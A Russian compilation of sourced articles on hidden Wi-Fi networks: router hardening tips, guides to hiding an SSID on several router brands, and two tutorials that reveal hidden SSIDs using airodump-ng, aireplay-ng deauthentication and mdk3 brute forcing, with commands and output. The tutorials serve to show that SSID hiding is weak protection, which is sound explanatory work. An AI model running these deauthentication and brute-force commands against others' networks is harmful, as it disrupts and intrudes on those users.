Скрытая точка доступа wifi

Содержание

Домашний Wi-Fi и экономные соседи: как защитить точку доступа

Скрытая точка доступа wifi

В наше время точки доступа Wi-Fi появились практически везде: в каждой квартире, в общественном транспорте, кафе или заведении другого рода — есть Wi-Fi маршрутизатор. Многие мобильные устройства тоже могут выступать в роли точки доступа к сети.

Чтобы примерно представить масштаб распространения Wi-Fi сетей в крупных городах, достаточно просто достать смартфон в любом общественном месте или собственной квартире и активировать функцию поиска сетевых подключений. Вероятно, в зоне действия окажется не менее трех-четырех точек доступа, мобильных устройств и других устройств, оборудованных модулем беспроводной связи.

Что говорить, стремительно набирает популярность даже «умная» бытовая техника, которой можно управлять удаленно (технологии «умного дома»).

Не стоит удивляться тому, что в результате повсеместного распространения таких сетей, уровень сознательности владельцев сетевого оборудования значительно упала.

Пользователи старшего возраста нередко просят младших родственников убрать пароль для подключения к роутеру, а кто-то оставляет заводской пароль, не задумываясь о возможных последствиях.

Даже если вы очень хороший человек и не прочь поделиться частью интернет-канала с экономными соседями, не забывайте, кроме бесплатного интернета, любой человек, получивший доступ к вашему сетевому оборудованию, если захочет, может получить и гораздо больше, чем бесплатный доступ в интернет.

Злоумышленники могут получить доступ к вашим деньгам, личным фотографиям, информации о вашем времяпрепровождении, а возможно и вскипятить чайник без вашего ведома!

Всего этого можно избежать, всего лишь позаботившись о своем роутере, путем совершения нескольких достаточно простых действий.

На всех маршрутизаторах по умолчанию установлен заводской пароль. Как правило, он не отвечает даже минимальным требованиям безопасности — может состоять из простейшей цифровой комбинации или быть одинаковым для всех роутеров одной модели.

Это значит, что подобрать его сможет не только хакер, но даже человек не слишком близкий к миру цифровых технологий.

Первым шагом после установки нового (особенно предоставленного провайдером) роутера должна быть замена заводского пароля. Самым устойчивым ко взлому паролем будет сложный порядок прописных и строчных букв, цифр и спецсимволов. При этом желательно, чтобы такой набор не образовывал каких-либо слов и словосочетаний.

Пример хорошего пароля: s9oLBqL9i*Gx

Для генерирования хорошего пароля вы можете воспользоваться одним из множества онлайн-генераторов:

  • LastPass;
  • Генератор паролей;
  • Randstuff.ru.

Если вы все-таки решили придумать пароль сами — запомните несколько простых правил:

  • не используйте в качестве пароля простейшие цифровые комбинации (000000, 111111 и т.д.);
  • ваша фамилия и домашний номер — тоже плохая идея;
  • не рекомендуется использовать и любые словосочетания.

Гостевой Wi-Fi — это обособленная точка доступа, которая не затрагивает домашние устройства, подключенные к основной точке и объединенные в сеть.

Подключившись к гостевой точке доступа, злоумышленник не сможет получить доступ к вашим домашним устройствам и информации хранящейся в их памяти.

Гостевое сетевое подключение обеспечивает пользователя только доступом во внешний интернет, оставляя другие домашние устройства вне зоны досягаемости. 
Если гостевая сеть не нужна, то ее необходимо отключить. У некоторых устройств она отключается автоматически, если не используется определенное время.

Для защиты от вторжений извне каждый современный маршрутизатор по умолчанию шифрует канал доступа в собственную сеть. Существует несколько протоколов шифрования:

  • OPEN. По сути, в таком протоколе полностью отсутствует шифрование. Передача данных в этой сети проходит по открытому каналу.
  • WEP. На сегодняшний день самый слабый тип шифрования, появившийся в 90-х годах 20 века. Имеет массу уязвимостей, взламывается за несколько секунд.
  • WPS(или QSS). Механический вход в сеть (вход осуществляется с помощью нажатия кнопки). Ненадежен, взламывается в течение суток.
  • WPA/WPA2. Самый надежный протокол. Основан на различных алгоритмах шифрования. До недавнего времени был практически неуязвим. Недавно хакеры нашли лазейки для его взлома, однако ваши соседи все еще имеют очень мало шансов пробиться сквозь такое шифрование.

Если среди ваших соседей не затесался Mr.Robot, то протокол WPA/WPA2 в комбинации со сложным паролем станет серьезной проблемой для любителей халявного интернета. 

Прежде чем использовать маршрутизатор убедитесь, что шифрование включено. Проверить это можно в WEB-интерфейсе роутера (через браузер).

Получить доступ к настройкам устройства можно введя в строке браузера url или ip-адрес, указанный на корпусе роутера (обычно на нижней его части).

При выборе способа шифрования ориентируйтесь на протокол WPA2 — он более надежен по сравнению с остальными.

Service Set Identifier (SSID) — это имя вашей беспроводной сети, которое ей присвоил завод-изготовитель маршрутизатора. Оно видно всем, кто обладает устройством с возможностью беспроводного подключения. По стандартному SSID любой человек может идентифицировать тип вашего роутера, что значительно облегчит его взлом (особенно если вы затянули со сменой стандартного пароля).

Вы можете также скрыть отображение SSID в настройках роутера, однако в этом случае гаджеты перестанут видеть его в списке доступных подключений и имя сети придется вводить каждый раз при переподключении к интернету.

Это усложнит работу, поэтому проще всего изменить идентификатор. В этом случае сложность не требуется — можете задать любое имя на свой вкус. Для этого необходимо зайти в меню, найти соответствующий раздел и изменить его.

Доступ к настройкам в большинстве устройств, осуществляется через браузер по протоколу http. Настройки, как правило, не защищены паролем, либо установлен простейший пароль, который может повторяться в рамках одной линейки или даже быть одинаковым для устройств от разных производителей (самые распространенные — admin, 000000 или другая простейшая комбинация цифр).

Поэтому доступ к настройкам устройства есть у любой учетной записи, рангом выше «продвинутого пользователя». Для защиты необходимо установить пароль или поменять установленный по умолчанию в меню маршрутизатора.

Необходимо систематически обновлять программное обеспечение роутера. Пакеты обновлений исправляют баги и уязвимости в прошивке устройства.

 Некоторые новейшие маршрутизаторы поддерживают функцию автоматического обновления прошивки. Если такая функция есть, то делать ничего не нужно.

 Вы также можете самостоятельно проверять наличие нового программного обеспечения в меню настроек и загружать их вручную.

Если ваше устройство не имеет функции автоматического или полуавтоматического обновления, вы должны загрузить соответствующий файл с официального сайта компании-производителя.

Источник: https://club.dns-shop.ru/blog/t-280-marshrutizatoryi/20240-domashnii-wi-fi-i-ekonomnyie-sosedi-kak-zaschitit-tochku-dostupa/

Как скрыть Wi-Fi сеть и сделать ее невидимой для соседей?

Скрытая точка доступа wifi

При поиске беспроводных сетей в офисном или многоквартирном здании можно обнаружить целый список Wi-Fi точек, обычно доступных только по паролю.

Если на вашем роутере настроена точка доступа, то в этом списке окажется и она. Она видна как вашим устройствам, так и соседским.

По желанию, имя этой точки можно скрыть из списка обнаружения, при этом Wi-Fi сеть продолжит исправно функционировать.

Нюансы скрытия

Чтобы исключить точку доступа из сетевого обнаружения, предполагается, что у вас уже установлен роутер и настроен на интернет-раздачу через Wi-Fi. Доступ к админ-панели роутера, в которую можно зайти через браузер, у вас тоже имеется. Функция доступна в том случае, если для подключения к Wi-Fi вы используете логин (SSID) и пароль.

После того, как функция скрытия станет активной, соединение по беспроводной сети прервётся на каждом подключённом устройстве, и ввести SSID и пароль придется заново.

Инструкция скрытия

Общая концепция того, как скрыть в сетевом обнаружении Wi-Fi сеть выглядит так:

  1. С помощью компьютера, ноутбука или смартфона, подключенного к локальной сети маршрутизатора, откройте через адресную строку браузера и войдите в админ-панель роутера.
  2. По умолчанию, войти можно по адресу 192.168.0.1 или 192.168.1.1 через одинаковый логин и пароль: admin. Если эти данные не подходят, посмотреть актуальные можно на задней стороне роутера, в его документации или в контракте, который вы заключали с провайдером.
  3. В настройках беспроводной сети выберите «Основные» и в разделе с заданием имени Wi-Fi (SSID), ниже выберите пункт «Скрывать точку доступа».

Естественно, каждый производитель маршрутизаторов использует собственную версию веб-интерфейса, поэтому ниже перемещайтесь на нужный вам.

ASUS

Как сделать Wi-Fi сеть в интерфейсе роутеров ASUS невидимой: откройте «Беспроводная сеть» – «Общее» – и выставите «Скрыть SSID (Да)».

Для наглядности процедуры скрытия точки доступа смотрите следующее видео:

В панели роутеров TPLink скрыть Wi-Fi сеть можно в разделе «Беспроводный режим» — «Настройки беспроводного режима».

Для этого нужно снять птичку с «Включить широковещание SSID». Затем переподключите каждое устройство к сети.

Веб-интерфейс для разных моделей роутеров этой фирмы отличается, но по скриншоту будет относительно понятно, куда нужно перейти и что нажать.

В разделе «Основные параметры» поставьте птичку напротив «Скрыть точку доступа» и сохраните изменения.

Tenda

На Wi-Fi роутере выберите «Настройки…», активируйте «Скрыть беспроводную сеть».

Zyxel

Перейдите на страницу «Точка доступа» и поставьте птичку напротив соответствующего раздела.

Ростелеком

Аналогично и в админ панели Ростелеком. С помощью указанной на скриншоте навигации поставьте галку напротив пункта «Скрыть…».

Подключение к скрытой точке

Для авторизации через скрытую Wi-Fi сеть, недоступную для сканирования, нужно знать ее SSID, а затем ввести пароль. В зависимости от используемой операционной системы, вариации подключения будут отличаться.

Windows 10

Авторизация проходит так:

  1. На панели задач (справа внизу) нажмите значок уведомлений, выберите «Сеть» и нажмите «Параметры сети и Интернет».
  1. В новом окне выберите «Управление известными сетями».
  1. Выберите «Добавление новой сети».
  1. Укажите логин, а затем и пароль.

Windows 7

В популярной «семерке» авторизация делается так:

  1. Нажмите ПКМ по Пуск и выберите «Центр управления…». В нем нажмите соответствующий скриншоту пункт.
  1. Выберите подключение к беспроводной сети вручную.
  1. Затем введите «Имя…», «Ключ безопасности» (пароль), выставите на последнем пункте метку «Подключаться…» и жмите «Далее».

Если наблюдается ошибка подключения, удалите упоминание об этой Wi-Fi точке и повторите попытку.

Android

Инструкции в формате видео смотрите тут:

Авторизация планшетов, смартфонов и TV-боксов проходит по сценарию:

  1. Перейдите в раздел Wi-Fi, активируйте функцию и опуститесь в конец списка.
  2. Выберите «Добавить…».
  1. Выставите защиту, которая используется в настроенной точке. Обычно это WPA2-PSK.
  1. Введите «Имя» и «Пароль» и дождитесь успешного соединения.

iOS

Для соединения с iPhone:

  1. Откройте в настройках Wi-Fi.
  2. Снизу щелкните по «Другая…».
  3. Выберите параметр безопасности WPA2, затем введите SSID и пароль.

Заключение

Создать скрытую точку доступа просто. Делается это в настройках маршрутизатора. Она продолжит работать, а соседи и взломщики-авантюристы не смогут обнаружить ее. Единственный нюанс, что при переключении на скрытый SSID, придётся повторно провести авторизацию со всех ранее подключенных устройств.

Источник: https://WiFiGid.ru/sovety-po-nastrojke-routerov/kak-skryt-wi-fi-set

Как узнать имя скрытой сети Wi-Fi

Скрытая точка доступа wifi

Владельцы некоторых беспроводных точек доступа настраивают их так, что те не транслируют своё имя (ESSID). Это считается, по их мнению, дополнительной защитой (наряду с паролем) ТД.

Проще говоря, скрытая сеть Wi-Fi (hidden), это сеть, которую не видно в списке доступных сетей. Чтобы к ней подключиться необходимо ввести её имя вручную.

На самом деле этот способ защиты является несостоятельным хотя бы потому, что в определённые моменты имя беспроводной сети (ESSID) всё равно транслируется в отрытом виде.

Есть целый комплекс рекомендаций, как защитить свой беспроводной роутер. Но этот вид защиты (сокрытие имени Wi-Fi), а также фильтрация по MAC адресу, не рекомендуются к применению, поскольку доставляют определённые трудности легитимным пользователям и не обеспечивают никакой защиты.

Данный материал показывает несостоятельность защиты сокрытием сети. Следующая часть покажет простоту обхода фильтрации по MAC адресу.

Как увидеть скрытые сети Wi-Fi

Начнём с того, что скрытые сети не такие уж и скрытые. Их очень легко увидеть с помощью Airodump-ng. Для этого переводим нашу беспроводную карту в режим монитора:

ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up

И запускаем Airodump-ng:

airodump-ng wlan0

Обратите внимание на строку

20:02:AF:32:D2:61 -40 108 3 0 6 54e WPA2 CCMP PSK

Это и есть «скрытая» Wi-Fi сеть. Все данные, кроме ESSID, доступны наравне с другими точками доступа. Да и об ESSID мы уже кое-что знаем: . Это означает, что длина имени 3 символа.

Имя этой ТД мы узнаем выполнив брутфорс с помощью программы mdk3. А пока перейдём к другой скрытой Wi-Fi сети и узнаем её имя при помощи Airodump-ng.

Получение имени скрытой сети Wi-Fi с помощью Airodump-ng

Имя сети (ESSID) передаётся в вещании в открытом виде и может быть перехвачено во время подключения клиента. Можно дождаться подключения клиента естественным образом, а можно ускорить процесс, если «выбить» (деаутентифицировать) от точки доступа.

После этого он сразу начнёт переподключаться, имя сети появиться в вещании в открытом виде, а мы, в свою очередь, его перехватим. Последовательность действий в точности соответствует тому, который описан в статье «Захват рукопожатий (handshake) в Kali Linux».

Поэтому если вы с ней уже знакомы, то вам будет совсем просто.

Смотрим доступные для атаки точки доступа

airodump-ng wlan0

Сеть со скрытым именем:

20:25:64:16:58:8C -42 1856 0 0 1 54e WPA2 CCMP PSK

Её ВSSID — 20:25:64:16:58:8C, длина её имени – 11 символов, она работает на на канале 1. Поэтому я запускаю airodump-ng на первом канале:  

airodump-ng wlan0 –channel 1

Если вы помните, при захвате рукопожатия я также указывал ключ -w после которого следовал префикс имени файла. Это можно сделать и сейчас — поскольку захват рукопожатия не мешает выявлению имени скрытой ТД. При этом вы убьёте сразу двух зайцев одним выстрелом.

Можно ничего не делать — достаточно просто ждать, когда кто-то подключится или переподключится естественным образом. Если вы торопитесь, то можно форсировать процесс использованием атаки деаутентификация.

Для этого мы открываем новое окно терминала и набираем там команду:

aireplay-ng -0 3 -a 20:25:64:16:58:8C wlan0

Здесь -0 означает деаутентификация, 3 означает количество отправленных пакетов, -a 20:25:64:16:58:8C это ВSSID целевой ТД, а wlan0 — сетевой интерфейс в режиме монитора.

Результат получен практически мгновенно:

Интересующая нас строка:

20:25:64:16:58:8C -34 100 1270 601 0 1 54e WPA2 CCMP PSK SecondaryAP

Т.е. имя “скрытой” сети – это SecondaryAP.

Плюсы использования Airodump-ng:

  • Значительно быстрее перебора с mdk3 (при использовании атаки деаутентификация)
  • Если не использовать атаку деаутентификация, то вы остаётесь невидимым для систем мониторинга беспроводных сетей

Минусы использования Airodump-ng:

  • Если нет клиентов, то данная программа бессильная для раскрытия спрятанной сети Wi-Fi
  • Если использовать атаку деаутентификация, то вы демаскируете себя.
  • Если не использовать эту атаку, то время раскрытия имени сети значительно увеличивается.

Получение имени скрытой сети Wi-Fi без подключённых клиентов (использование mdk3)

О программе mdk3 и о всех её возможностях и доступных опциях вы можете прочитать в Энциклопедии Kali Linux.

Плюсы использования mdk3:

  • Работает в ситуациях, когда Airodump-ng бессильна.
  • Для нахождения имени скрытой Wi-Fi не нужны клиенты ТД.

Минусы использования mdk3:

  • Подбор может затянуться на длительное время, особенно для длинных имён точек доступа Wi-Fi.
  • Вы всегда демаскируете себя, ваша активность для мониторов беспроводной сети выглядит крайне подозрительной.

Помните нашу первую скрытую ТД

20:02:AF:32:D2:61 -40 108 3 0 6 54e WPA2 CCMP PSK

К сожалению, у этой ТД нет клиентов, поэтому мы не можем воспользоваться магией Airodump-ng. Вместо этого мы воспользуемся брутфорсом mdk3.

Моя команда имеет вид:

mdk3 wlan0 p -t 20:02:AF:32:D2:61 -f /root/essid.txt

Здесь mdk3 – это имя программы, wlan0 – имя беспроводного сетевого интерфейса, p — означает базовое зондирование и режим брутфорса ESSID, -t 20:02:AF:32:D2:61 – это BSSID интересующей нас ТД, -f /root/essid.txt указывает на файл, в котором содержится список имён для брутфорса ESSID (имени сети Wi-Fi).

Результат работы программы:

root@HackWare:~# mdk3 wlan0 p -t 20:02:AF:32:D2:61 -f /root/essid.txt SSID Wordlist Mode activated! Waiting for beacon frame from target… Sniffer thread started SSID is hidden. SSID Length is: 3. Trying SSID: Packets sent: 1 – Speed: 1 packets/sec Got response from 20:02:AF:32:D2:61, SSID: “web” Last try was: (null) End of SSID list reached.

Т.е. имя сети подобрано, им оказалось web.

Выше показана атака по словарю. Но имена беспроводных сетей можно добывать с помощью обычного перебора. Моя команда приобретает вид:
mdk3 wlan0 p -t 20:02:AF:32:D2:61 -с 6 -b l

Большинство опций нам уже знакомы, кроме двух новых: -с 6 означает шестой канал, -b l означает набор символов, при этом l означает нижний регистр.

Наборы символов:

  • все печатные (a)
  • нижний регистр (l)
  • верхний регистр (u)
  • цифры (n)
  • нижний и верхний регистр (c)
  • нижний и верхний регистр плюс цифры (m)

root@HackWare:~# mdk3 wlan0 p -t 20:02:AF:32:D2:61 -с 6 -b l SSID Bruteforce Mode activated! Waiting for beacon frame from target… Sniffer thread started SSID is hidden. SSID Length is: 3. Trying SSID: Packets sent: 1 – Speed: 1 packets/sec Got response from 0C:54:A5:C0:24:D6, SSID: “DANIELLE2015” Last try was: aaa Trying SSID: mla Trying SSID: rab Packets sent: 695 – Speed: 395 packets/sec Got response from 20:02:AF:32:D2:61, SSID: “web” Last try was: xeb

Как видим, программа просто прекрасно (и быстро!) отработала. Результат получен: Got response from 20:02:AF:32:D2:61, SSID: “web”.

Подытожим. Защита Wi-Fi путём сокрытия имени сети (наряду с фильтрацией по MAC адресу – об этом смотрите статью “Как обойти фильтрацию по MAC адресу”) являются негодными средствами безопасности. Никто не запрещает их использовать — они не ослабляют защиту. Но они и не увеличивают её.

При этом приходится мириться с неудобствами, которые они причиняют легитимным пользователям. Если мы говорим о фильтрации по MAC адресу, то при любом добавлении нового клиента, кто-то должен получать административные права для роутера и поменять его конфигурацию.

Это может быть не всегда приемлемо.

Источник: https://HackWare.ru/?p=106

Как узнать SSID скрытой точки доступа

Скрытая точка доступа wifi

В этой статье расскажу вам, как узнать SSID скрытой точки доступа. Это не сложный вопрос и его описания хватило бы несколько строк. Но на мой взгляд лучше один раз описать, как это делается. Чем по сто раз писать одно и тоже в х (наболело).

По научному это называется – отключение широковещательной рассылки идентификатора сети. “Скрытие” SSID точки доступа входит в набор базовых механизмов защиты стандарта 802.11. К таким механизмам относятся:

  • ограничение зоны распространения радиосигнала
  • списки контроля доступа на основе списков MAC-адресов
  • отключение широковещательной рассылки идентификатора сети
  • изменение стандартных настроек
  • защита точек доступа

Подробное описание остальных базовых механизмов защиты будет рассказано в следующих статьях. А сейчас, как всегда теория.

Теория – Рассылка SSID

Теория взята из книги  “Безопасность беспроводных сетей“. Мне кажется, что это будет правильно. Чем писать отсебятину. Более того, авторами этой книги являются С.В. Гордейчик и В.В. Дубровин. Которые не нуждаются в представлении – их и так все знают.

В служебных фреймах Beacon и Probe Response точка доступа отправляет индентификатор сети и другие служебные данные. Именно эту информацию выводят стандартные утилиты подключения к беспроводной сети и многочисленные “стамблеры”.

Стандартом предусмотрена и в большинстве точек доступа реализована возможность отключать широковещательную рассылку SSID. Этот режим обычно называется “Disable SSID Broadcast” или “No Guest Mode“.

В результате в поле SSID во фреймах Beacon и Probe Response будет указываться пустая строка.

Такие сети не будут отображаться в утилитах типа Netstambler и не будут видны в списке доступных сетей стандартного беспроводного клиента. В результате может возникнуть ощущение, что таким образом удастся скрыть сеть от злоумышленника, который не знает ее SSID.

Но задача поиска сети по ее идентификатору остается нерешенной, и, поскольку она не реализуется точкой доступа, ее берут на себя станции беспроводной сети.

Для этого клиенты рассылают в запросах Probe Request идентификаторы сетей, указанные в профиле подключения.

Если точка доступа отвечает на такой фрейм, значит, ее SSID совпадает со значением, указанным в запросе, и можно приступать к процедуре подключения.

В результате злоумышленник, прослушивающий сеть в режиме мониторинга, получает возможность узнавать идентификатор сети. Существует большое количество утилит, работающих по такому принципу, например, популярный анализатор беспроводных сетей Kismet.

С их помощью довольно просто узнать идентификатор “скрытой” сети, если с ней работают клиенты. Кроме того, такая логика работы станции приводит к разглашению настроек профиля беспроводных подключений клиента, поскольку он вынужден рассылать SSID с конфигурированных станций.

Таким образом, прекращение широковещательной рассылки идентификатора сети не является серьезным средством защиты, разве что может снизить количество срабатываний системы обнаружения атак, связанных с попытками подключения совсем уж неумелых “хакеров”. Однако, поскольку большинство беспроводных клиентов рассылает SSID сети в запросах на подключение независимо от типа точки доступа, возможно, есть смысл использовать эту возможность.

Практика

С теорией ознакомились. Давайте выведем из нее главное условие для нашей практики – к АР должен быть подключен клиент! Если клиентов не будет, тогда не получится узнать SSID “скрытой” точки доступа.

Итак, загружаемся в BackTrack 5 R2. Открываем консоль. Переводим Wi-Fi клиента в режим монитора (monitor mode):

# airmon-ng start wlan1

Сканируем сети в радиусе действия:

# airodump-ng mon0

Видите в столбце “ESSID” не понятное название ? Так вот – это и есть скрытая точка доступа (АР).

Теперь переключаемся на нее:

# airodump-ng -c 1 -w hide_AP –bssid BC:AE:C5:71:D3:17 mon0

Видим, что к точке доступа подключен один клиент с МАС-адресом (70:F1:A1:72:B4:25). Значит у нас должно все получится. Теперь открываем новое окно терминала (Ctrl+Shift+N).

[ad name=»Responbl»]

Здесь мы должны послать клиенту, от имени точки доступа (АР), пакет на деаутентификацию. Делается это следующей командой:

# aireplay-ng -0 1 -a BC:AE:C5:71:D3:17 -c 70:F1:A1:72:B4:25 mon0

  • -0 – деаутентификация
  •  1 – количество пакетов
  • -a – MAC-адрес точки доступа
  • -c – MAC-адрес клиента, к которому применяется деаутентификация

11:12:18  Waiting for beacon frame (BSSID: BC:AE:C5:71:D3:17) on channel 1 11:12:18  Sending 64 directed DeAuth. STMAC: [70:F1:A1:72:B4:25] [ 5| 6 ACKs]

После этого в первом окне терминала должна наблюдать следующая картина:

Как видите Wi-Fi сеть, SSID которой был раньше скрыт, теперь нам известен. После этого смело можно взламывать. Описывать взлом в этой статье не буду, так как считаю, что материала достаточно.

Взлом Wi-Fi сетей с шифрованием WPA/WPA2:

  • Как взломать пароль WPA сети Wi-Fi с помощью Reaver

Взлом Wi-Fi сетей с шифрованием WEP:

Дополнительные материалы:

Источник: https://cryptoworld.su/hiden-ssid/

Как Скрыть WiFi Сеть На Роутере За 1 Минуту? – ВайФайка.РУ

Скрытая точка доступа wifi

В данной статье речь пройдет о невидимой WiFi сети со скрытым SSID. Я покажу, как ее включить на роутерах TP-Link, Asus, Zyxel Keenetic, D-Link, Tenda, Apple, Upvel. В настройках любого маршрутизатора есть такая функция, как «Сделать SSID невидимым». Или «Скрыть WiFi сеть» — называться она может по-разному. Для чего она нужна?

Что такое вещание SSID (Broadcast)?

Вещание SSID, или Broadcast — это ретрансляция wifi сигнала, при котором его название видно всем беспроводным сетевым адаптерам, которые находятся в зоне приема.

Что такое скрытая сеть WiFi и невидимый SSID?

Суть скрытой сети wifi с невидимым SSID в том, что если кто-то захочет нелегально подобрать ключ и использовать ваш интернет в своих целях, то ее не увидят в списке доступных для подключения сигналов.

На самом же деле чисто физически ваша сеть никуда не девается, просто ее имя не отображается. То есть подключение будет существовать и вы будете пользоваться интернетом, как раньше. Но название wifi не будет отображаться ни на одном устройстве, которое будет ее искать.

Подсоединиться к ней сможет только тот, кто точно знает ее скрытый SSID и пароль.

Как сделать скрытую точку доступа?

Для того, чтобы скрыть точку доступа и сделать невидимым SSID сети, нужно выполнить несложные настройки на маршрутизаторе.

Вообще, как дополнительную меру защиты эту возможность целесообразно использовать только если у вас

  • Есть реальная угроза взлома
  • Нет никаких проблем с сетью и вы точно знаете, что она стабильно работает

Если же у вас роутер глючит, сеть постоянно пропадает, невидимым SSID от wifi вы только усложните себе поиск возможных проблем. Когда сеть реально не будет работать, а не просто будет скрыта.

Кроме того, WPS не доступен при скрытом SSID!

Поэтому каждое новое устройство придется подключать вручную, что не очень удобно.

Тем не менее, раз уж вы решили все-таки сделать сеть WiFi невидимой, то давайте посмотрим, как скрыть ее на роутере TP-Link. Это очень просто. Нужно

  1. Авторизоваться в админке по адресу http://192.168.0.1
  2. В меню перейти в основные настройки того диапазона, в котором необходимо скрыть сеть (2.4 или 5 ГГц)
  3. Убрать галочку с «Включить широковещание SSID»

В новой версии панели администратора нужно зайти во вкладку «Дополнительные настройки» и открыть раздел «Беспроводной режим — Настройки беспроводного режима». И точно так же снять флажок в соответствующем пункте, после чего сеть WiFi на TP-Link станет невидимой.

Аналогично происходит и на моделях других производителей.

Следующим примером будет служить роутер фирмы Tenda. Для начала заходим в настройки маршрутизатора по адресу tendawifi.com.

И находим тут раздел «Название и пароль беспроводной сети»

Здесь отображается SSID работающих в данный момент сетей — у меня активна только одна в диапазоне 2.4 ГГц. Напротив названия сети имеется флажок «Скрыть» — активируем его и сохраняем настройки.

После того, как роутер Tenda перезагрузится, данный WiFi пропадет из списка сетей, которые видны при настройке беспроводного подключения на компьютерах, ноутбуках и смартфонах.

Если вы настраиваете свой роутер Тенда с телефона, то сделать невидимым SSID беспроводной сети можно из пункта меню «Имя и пароль сети WiFi». Здесь достаточно переключить в активное положение ползунок «Скрыть сеть WiFi»

Точно также снимаем галочку в админке роутера D-Link

Скрытая сеть вайфай на маршрутизаторе Asus

В Asus же наоборот — активировать флажком пункт «Скрыть SSID» в разделе «Беспроводная сеть»

Невидимый wifi через роутер Zyxel Keenetic

Также и у Zyxel на вкладке «Точка доступа»

В современных маршрутизаторах Keenetic, чтобы скрыть SSID wifi, нужно открыть «Дополнительные настройки» домашней сети

и отметить «Скрыть SSID»

Apple Airport

Как и в любом wifi роутере, на Apple Airport есть возможность скрыть сеть от «глаз» чужих смартфонов, сделав ее невидимой. Осуществить эту задачу можно как с компьютера, так и через мобильное приложение на iPhone.

Для того, чтобы сделать сеть невидимой через компьютер, необходимо запустить стандартную программу для настройки Airport Utility

  1. зайти в «ручные настройки»
  2. перейти на вкладку «Wireless» и нажать кнопку «Wireless Network Options»
  3. Здесь, кроме того, что можно активировать сеть 5ГГц, отдельным пунктом включается скрытая сеть — «Create a closed Network»

    Ставим сюда галочку и сохраняем кнопкой «ОК» и затем «Update»

Чтобы создать невидимую сеть на iPhone, запускаем мобильное приложение

Кликаем по значку роутера Apple Airport

Авторизуемся в админке («Ввести пароль — Изменить») и заходим в раздел «Сеть»

Последний пункт настроек — «Скрытая сеть» — включаем его и нажимаем кнопку «Готово»

Невидимая сеть Wi-Fi на роутере Huawei

Включение скрытой сети на роутере Huawei находится в разделе «Расширенные настройки Wi-Fi» в меню «Дополнительные функции». Здесь нужно найти параметр «Невидимый Wi-Fi» и активировать ее

Отключить трансляцию SSID на Upvel

Для того, чтобы скрыть название wifi сети на роутере Upvel, надо зайти в «Wi-Fi сеть — Основные настройки» и в графе «Трансляция SSID» поставить режим «Выкл.»

Несмотря на то, что ваша сеть WiFi стала невидимой, при необходимости ее SSID можно поменять здесь же, в настройках wifi роутера. Подробно об этом мы написали в соседнем посте.

про скрытие названия (SSID) сети

Источник: https://wifika.ru/kak-sdelat-set-wifi-nevidimoy-na-routere-tenda.html

Как скрыть Wi-Fi сеть роутера, чтобы никто не знал о ее существовании. Как после подключиться к невидимой Wi-Fi сети

Скрытая точка доступа wifi

Доброго времени суток!

А вы никогда не задумывались, что имя вашей созданной Wi-Fi сети могут видеть все соседи в округе? Причем, не только видеть, но и попробовать подключиться к ней, пытаясь угадать пароль (и им для этого даже ненужно обладать никакими спец. программами). Согласитесь, такая открытость не всегда хорошо сказывается на безопасности…

Но есть выход. Многие современные роутеры и др. устройства поддерживают режим работы Wi-Fi, при котором название вашей сети будет скрыто. Т.е. для подключения к ней нужно будет знать не только пароль, но и ее имя (тем самым, повышаем еще и приватность: большинство людей не будет знать, что вы создали Wi-Fi сеть).

В этой статье как раз хотел показать, как можно скрыть имя сети, и как в последствии подключиться к ней (в общем-то, как всегда и везде есть свои нюансы). Надеюсь, найдете что-то полезное для себя  …

*

Делаем “невидимую” Wi-Fi сеть и подключаемся к ней

При настройке беспроводного подключения, в веб-интерфейсе роутера вы задаете имя беспроводной сети (или его еще называют SSID).

Во время работы роутера, он сообщает всем устройствам в радиусе действия Wi-Fi сети ее идентификатор SSID. Разумеется, в радиус действия сети могут попадать не только ваши устройства, но и, например, ваших соседей. Т.е.

они могут легко ее увидеть, и попробовать подключиться (а учитывая, что многие задают очень простой пароль, могут и угадать его…).

Но во многих современных роутерах (как уже сказал выше) есть опция, которая позволяет скрыть этот идентификатор SSID (в англ. версии прошивки роутера эта функция будет называться что-то вроде “Hide SSID”).

Если задействовать эту функцию, то роутер перестанет рассылать имя сети, и она перестанет отображаться в списке доступных для подключения.

В теории, подключиться к ней можно будет только в том случае, если вы знаете ее имя (SSID), тип шифрования, и пароль* (логично, что эту информацию может знать только тот человек, который имеет доступ к настройкам роутера, т.е. “хозяин” сети).

Отмечу, что после скрытия SSID, у вас могут наблюдаться небольшие “проблемы”: некоторые устройства не смогут автоматически соединяться с сетью, плюс на тех, что уже были подключены к сети, необходимо будет настроить подключение заново. В некоторой степени это неудобно, но за повышение безопасность всегда приходится платить…

* PS

Даже если в настройках задается скрытие SSID, все равно, при работе роутера транслируется другой идентификатор – BSSID (Basic Service Set Identifier, формируется с MAC-адресом). И благодаря некоторым программам (их называют сканерами), такая сеть может быть обнаружена (все тайное – становится явным) …

Как скрыть Wi-Fi (через веб-интерфейс роутера)

В большинстве моделей роутеров делается все достаточно просто: в их веб-интерфейсе достаточно открыть вкладку параметров беспроводной сети, и поставить галочку напротив пункта “Скрыть беспроводную сеть” (если у вас англ. прошивка – то ищите что-то вроде “HIDE SSID”). В качестве примера ниже приведен скриншот настроек роутера Tenda.

В помощь! Как зайти в настройки роутера – https://ocomp.info/kak-zayti-v-nastroyki-routera.html

Скрыть беспроводную сеть (роутер Tenda)

В роутерах D-Link эта опция называется аналогично “Скрыть точку доступа” (вкладка Wi-Fi). См. пример ниже.

D-Link DIR-300NRU – скрыть точку доступа (раздел Wi-Fi)

В некоторых роутерах (например, TP-Link WR740N) опция называется несколько иначе. Чтобы скрыть Wi-Fi сеть – нужно снять галочку с пункта “Включить широковещание SSID”.

Отключаем вещание SSID для скрытия сети (роутер TP-Link WR740N)

Обращаю внимание!

После того, как вы поставите галочку скрытия сети и сохраните настройки, на некоторых устройствах (ноутбуке, смартфоне и пр.) будет необходимо переподключиться к этой Wi-Fi сети. О том, как это сделать, см. ниже в статье.

Какие настройки роутера задать, чтобы повысить безопасность

Сразу скажу, что безопасность Wi-Fi подключения на сегодняшний день (даже при использовании WPA2 с шифрованием AES) оставляет желать не лучшего, а наилучшайшего! Слишком много “дыр” в этом типе связи…

Тем не менее, соблюдая хотя бы основные меры безопасности, вы существенно повысите надежность своей сети, и защитите ее от множества начинающих взломщиков.

Чтобы я порекомендовал для повышения безопасности Wi-Fi:

  1. пароль длиной не менее 8 символов, в котором используются цифры и буквы латинского алфавита (без общеупотребительных слов);
  2. ставьте стандарт безопасности: “WPA2 с шифрованием AES”;
  3. скрывайте свою Wi-Fi сеть;
  4. отключите UPnP, WPS (эти функции достаточно “дырявые”, и многие, даже начинающие взломщики, используют их уязвимости);
